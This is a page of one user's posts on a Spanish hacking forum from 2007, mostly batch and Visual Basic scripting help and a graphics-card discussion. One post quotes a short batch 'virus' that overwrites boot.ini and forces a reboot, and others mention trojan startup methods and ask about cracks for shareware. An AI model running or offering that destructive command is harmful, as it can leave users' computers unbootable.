elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Arreglado, de nuevo, el registro del warzone (wargame) de EHN


  Mostrar Mensajes
Páginas: 1 ... 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 [41] 42 43 44 45 46 47 48 49 50 51
401  Programación / Scripting / Re: Opiniones y mejoras en: 17 Mayo 2007, 12:27 pm
Nada, para eso estamos  :xD :xD

Me he reido con este post(sin animos de ofender, yo tambien soy un "nov",  bueno no tanto),  ;D No entiendo el bat de Sirdarckat  :P....
Y con este virus dedstrtuyes cualquier Pc con XP sin que ni para que.
Código:
@echo off
cd\
echo Chorrada>boot.ini
shutdown -r -t 01 -c "Jajajajajajajajajaja"
exit

El bat de Sdc utiliza el comando DEBUG para crear un archivo "pienso k binario o ASM o no se muy bien" que al escribirlo con un type en la consola crea un pitido, despues ejecuta un bucle con ese pitido...pero para el bucle sería mejor usar el for y delimitarlo a un numero determinado de pitidos y no un bucle infinito de goto

Por cierto, tu bat lo k hace es sustituir el boot.ini (archivo que contiene los diferentes SO y opciones de arranke de estos) por un archivo que pone "Chorrada" y despues reinicia a los 1 segundos mostrando el mensaje "Jajajajajaja"

No se realmente si jode un PC...pero en caso de que no arrankara sería muy facil de solucionar eso...

Weno...además ese no es el tema...la cuestion es crear un programa que vaya cambiando el color de la consola...lo de los pitidos tambien es interesante jajaja

Saludos ;) ;) ;)
402  Informática / Tutoriales - Documentación / Re: Manual de procesos que se ejecutan al inicio de Windows XP en: 17 Mayo 2007, 12:09 pm
Mmmmm, no se...pienso k n...tu te refieres a esto no??:
http://foro.elhacker.net/index.php/topic,164557.0.html

Pues lei ese post tuyo y el eyeboot se ejecuta al inicio desde la BIOS no? o eso es lo k kieres no?

Pues no, estes métodos de inicio son para iniciar cualkier programa al inicio de Windows XP pero cuando ya se cargo el kernell de WinXP...los arrankes tipo boot k dices son desde la BIOS y sectores de arrankes maestros...pues lo siento pero no tengo experiencia con esos tipos de arranke.

Mi manual es para que la gente conozca que hay miles de maneras de iniciar un proceso al inicio de Windows XP, eso viene bien para troyanos (para k se ejecute siempre k se enciende la makina) tambien para conocer como se inician los distintos virus, trojans y spyware k puedas tener  :xD y tambien para quitar programas k se inician al inicio y k hacen ir mas lento al ordenador...

Bueno en fin...sobre arrankes boot (si es lo k pienso) no trato pork no se...no tengo experiencia en eso...

Saludos ;) ;)

P.D.: Dentro de poco voy a añadir un metodo mas de inicio que es el que trae Windows XP para ejecutar Scripts al inicio...aunke se puede poner otro ejecutable cualkiera
403  Programación / Scripting / Re: Opiniones y mejoras en: 15 Mayo 2007, 22:46 pm
Errores:

-Weno, primero debes de poner una linea así:

Código:
@echo off

Esto es para ocultar el eco de los comandos, la salida que originen estos en la pantalla se verá igual...

-En esta linea hay un error:

Código:
if %eleccio%==2 goto CMD

Si eliges la segunda opcion se ejecuta goto CMD lo que te llevaría a una etiqueta :CMD que no existe...

-Para la opcion 3 es mejor esta linea

Código:
if %eleccio%==3 exit

que esta:

Código:
if %eleccio%==3 goto surti

No esta mal tu forma pero mejor ordenarle directamente al BATCh salir que mandarlo a una etiqueta al final de archivo...
Lo mismo despues para la opcion 2 de la etiqueta "enloquecer"

-Por ultimo el peor error es el buble, usa un bucle FOR puesto que un bucle GOTO te consumirá todos los recursos del ordenador...tambien es recomendable poner un "sleep"...puedes hacerlo con el comando ping así:

Código:
ping 127.0.0.1 -n 1>nul

donde 1 es el tiempo en segundos a esperar...

Estos son los errores k veo a sí por encima...debe de haber mas...como el k me acabo de fijar ahora...sería bueno k añadieses una opcion contra errores para el caso en el k el usuario eligiese una opcion diferente k las k se ofrecen...pork si se le pide elegir entre la opcion 1, 2  y 3 y pone "4" pues para k no se ejecute indebidamente...

Weno, tu tranki k todos fuimos novatos...yo por ejemplo soy novato en VB y pregunto cosas tontas y nadie se rie de mi...ademas lo k estas haciendo es bueno para empezar...

Saludos ;) ;) ;)
404  Informática / Hardware / Re: Más memoria para la VGA significa más velocidad ¿seguro? en: 11 Mayo 2007, 14:43 pm
Esto es interesante, y mucha gente no le da importancia...

Cuando compré el ordenador yo también pensaba que lo importante era la memoria...pero no...despues de recibir aki unos consejos (la gran mayoria de Cobac :xD) compré una de si, 512MB, pero me fijé en que fuera la ultima de NVidia que habia en el momento, GF7950GT...ahh, y k fuese al menos 256bit, weno, había ya una tecnologia de NVidia algo mejor aún (aunke aun no existian las 8) pero eran demasiado caras incluso con memorias bajas, me fijé en que la memoria fuese DDR3 y ambien en la velocidad del bus, el cual comparé con otras y era mas o menos el mismo para todas, de las que cumplian lo anterior elegi la que tenía velocidades de clock y bus mas altas (k kuriosamente costaban lo mismo que las otras)

Ahora mi grafica va como un trueno, nunca me dió problemas...lo unico malo es k no se puede overclackear mucho pero weno...tampoco lo necesita mucho :xD

Ahh, y decir que por ejemplo cuando pregunté pork grafica comprar, al final puse k iba a comprar la k ahora mismo tengo, la de mi firma (Xpertvision 512MB GF7950GT 700MHz DDR3 550MHz clock) y me dijeron "Si vas a comprar una SLI te es mejor comprar dos mas baratas". Eso es mentira, mejor comprar una buena que dos baratas en SLI...

Hace unos años cuando un amigo mio (yo de akellas no me enteraba casi de nada jejeje) k entiende bastante sobre ordenadores me compro el ordenador (otro k tenia), pues eligió una NVidia Geforce4 64MB a 128bit, otro amigo mio tenia un procesador, memoria y placa base mejores k el mio y se compro una ATI 256MB (no se nada mas de su tarjeta graf.) Pues el tenia muchos mas problemas con los juegos, le iban lentos e incluso algunos no le funcionabas, y el ordenador era mejor que el mio, su grafica mucho MB mucho MB pero nada de bueno...sin embargo la mia iba perfecta con juegos hace poco y con resulociones y calidades altas), ahora algunos ya empiezan a ir lentos, aunke aún va bien incluso con algun juego de ahora si no le pongo graficos muy altos...Esa grafica tendrá ahora 4 o 5 años...asi k miren...

Pues eso, este post me parece bueno pork la gente (y yo antes también :xD) solo se fija en la memoria...

Un saludos ;) ;)
405  Programación / Scripting / Re: Temporizador en BATCH en: 8 Mayo 2007, 15:34 pm
ah tienes razon nhaalclkiemr necesitas ser admin.. no habia pensado en eso..
se podria hacer mas pequeño tu codigo jeje :P, pero parece q funciona
ping es una buena opcion para emular un sleep() :P pero para este

Saludos!!

Si, weno, la verdad es que el codigo es largo pork le puse un metodo para corregir errores.

La parte del principio sirve para evitar que si un usuario tiene el formato de hora diferente del normal afecte al programa, podría hacer que no funcionara...

Despues intenta ejecutar el comando AT y se produce un error (si eres Admin o no existe AT) lo intenta con el SCHTASKS (tambien fallará si eres Administrador) y utiliza la funcion PING para esperar los 20 minutos...


Neox, he visto tus scripts y están bastante bien, hay algunos muy buenos...el de funcion SLEEP no lo prové pero por la pinta del codigo parece bueno...

Saludos ;) ;)
406  Seguridad Informática / Hacking / Re: Necesitas una contraseña? en: 8 Mayo 2007, 15:18 pm
Buena aportacion ;D ;D

Una pregunta, los programa esos algunos son shareware, tienen sus respectivos cracks y/o serials o no?

Un saludo ;) ;)
407  Programación / Scripting / Re: Temporizador en BATCH en: 7 Mayo 2007, 18:33 pm
Claro, por hacer se podría usar tambien el comando ping para esperar...pero lo mejor es usar AT o SCHTASKS

Aunke lo malo es que necesitas privilegios de Administrador...

Código:
@echo off
set a=0
set z=%TIME:~0,2%
if "%TIME:~0,1%"==" " set z=0%TIME:~1,1%
if "%TIME:~8,1%"=="," goto normal
if "%TIME:~10,1%"=="," goto 2caso
if "%TIME:~12,1%"=="," goto 3caso
:normal
set x=%TIME:~3,2%
set y=%TIME:~6,2%
goto a
:2caso
set x=%TIME:~4,2%
set y=%TIME:~8,2%
goto a
:3caso
set x=%TIME:~5,2%
set y=%TIME:~10,2%
:a
set errorlevel=
set /A a=%a%+1
if "%x%"=="08" set x=8
if "%x%"=="09" set x=9
set /A x=%x%+20
if %x% GTR 59 set /A x=%x%-60
at.exe %z%:%x% "archivo_que_quieras"
if %a%==11 goto b
if not %errorlevel%==0 goto a
exit
:b
set a=0
:c
set errorlevel=
set /A a=%a%+1
if %x% LEQ 9 set x=0%x%
schtasks /create /tn temp /tr "archivo_que_quieras" /sc once /st %z%:%x%:%y% /ru System
if %a%==11 goto error
if not %errorlevel%==0 goto c
exit
:error
echo "Se ha producido un error con los comandos, provando instruccion ping"
ping 127.0.0.1 -n 1200
"archivo que quieras"
exit

Este code te debería de funcionar, substitue "archivo_que_quieras" por el archivo que quieras (logico :xD ) y debería de funcionar...
Primero intenta utilizar el comando AT, despues el SCHTASKS y en caso de fallar utiza la instrucción PING para esperar los 20 minutos...

Saludos ;) ;)


Saludos
408  Foros Generales / Sugerencias y dudas sobre el Foro / Si eres humano acepta en: 7 Mayo 2007, 00:06 am
¿Porque a entrar al foro aparece una caja de pregunta preguntando si eres humano o no?

¿Es una medida contra el DoS?  :huh: :huh:
409  Programación / Programación Visual Basic / [Novato] Leer archivos y modificarlos en: 5 Mayo 2007, 01:54 am
Pues bien, yo lo que quiero hacer es cojer un archivo, leer su contenido y escribirlo en otro...eso de momento...

Soy novato en esto y prové este code pero no se bien lo que hice, lo que intento ahora al principio es abrir un archivo con Open y copiar la primera linea y escribirla en el segundo...pero algo hago mal:

Código:
Option Explicit
Public filen
Public filen2
----------------------------
Private Sub cmd_Click()

End Sub
----------------------------
Private Sub cmdEncriptar_Click()
Dim inpu
Dim i
Open "filen" For Input As #1
Open "filen2" For Output As #2
Line Input #1, inpu
Write #2, 1, inpu
Close #1
Close #2

End Sub
--------------------------
Private Sub cmdExaminar_Click()
Dim filen
filen = dlgExaminar.FileName
dlgExaminar.ShowOpen
txtExaminar.Text = dlgExaminar.FileName
End Sub
-----------------------------

Private Sub lblExaminar_Change()

End Sub

------------------------
Private Sub Text1_Change()

End Sub
--------------------------
Private Sub cmdExaminar2_Click()
filen = dlgExaminar2.FileName
dlgExaminar2.ShowOpen
txtExaminar2.Text = dlgExaminar2.FileName
End Sub
-----------------------
Private Sub txtExaminar_Change()

End Sub
----------------------------
Private Sub txtExaminar2_Change()

End Sub

¿Como puedo hacer para copiar el contenido o parte de él en otro archivo?

Posteriormente me gustaría saber la forma de como puedo hacer para modificar el valor de cada byte...

Intento hacer una especie de crypter muy sencillo...

Saludos ;) ;)
410  Programación / Scripting / Re: Como imprimir el valor de una variable definida en una variable... en: 3 Mayo 2007, 16:45 pm
Código:
Las extensiones de comandos están habilitadas de forma predeterminada en Windows XP. 

Esto lo pone en la ayuda de Windows...Y ademas ya prové lo que tu dices, no se me expande la variable de la manera que tu dices, y tengo las extensiones de comandos habilitadas.

Incluso prove los ejemplos que trae el comando set /?. En teoria el primero deberia de funcionar y el segundo no:

Código:
@echo off
set VAR=antes
if "%VAR%" == "antes" (
    set VAR=después
    if "!VAR!" == "después" @echo Si esto se puede ver, entonces significa que funcionó
)
pause

Código:
@echo off
set VAR=antes
if "%VAR%" == "antes" (
    set VAR=después
    if "%VAR%" == "después" @echo Si esto se puede ver, entonces significa que funcionó
)
pause

Pues a mi no me funciona ninguno :-( :-(
Páginas: 1 ... 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 [41] 42 43 44 45 46 47 48 49 50 51
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines